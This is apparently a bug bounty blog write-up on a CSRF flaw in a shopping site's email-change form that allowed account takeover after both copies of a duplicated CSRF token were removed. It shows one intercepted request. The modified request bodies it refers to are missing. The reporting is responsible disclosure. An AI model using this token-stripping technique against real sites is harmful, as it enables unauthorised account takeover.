Account takeover CSRF Misconfiguration

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as

Since this site was a shopping site. I started playing with price param to get things for free but failed. The program was 2 years old i thought that my account section might not be vulnerable as the site already had around 100 reports. But lets test under my account page their is a option to change Email-id without entering password looks nice to me because it can end up with account takeover using CSRF, but as soon as i intercepted the request i observed that in the post request is has a CSRF protection.

POST /customer/account/edit/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 262
Connection: close


So i started testing for CSRF i removed the CSRF token, something like


tried but ended up with error. Next thing to do remove CSRF_TOKEN completely looks something like this


again ended up error. After 10 mins of testing i found that CSRF_TOKEN is send 2 times in the request


I removed both the CSRF_TOKEN, POST request like


And I was able to takeover anyone’s account

Reported: 12 march 2020
Responded: 15 march 2020
Rewarded: $XXX 24 April 2020

Leave a Reply

Your email address will not be published. Required fields are marked *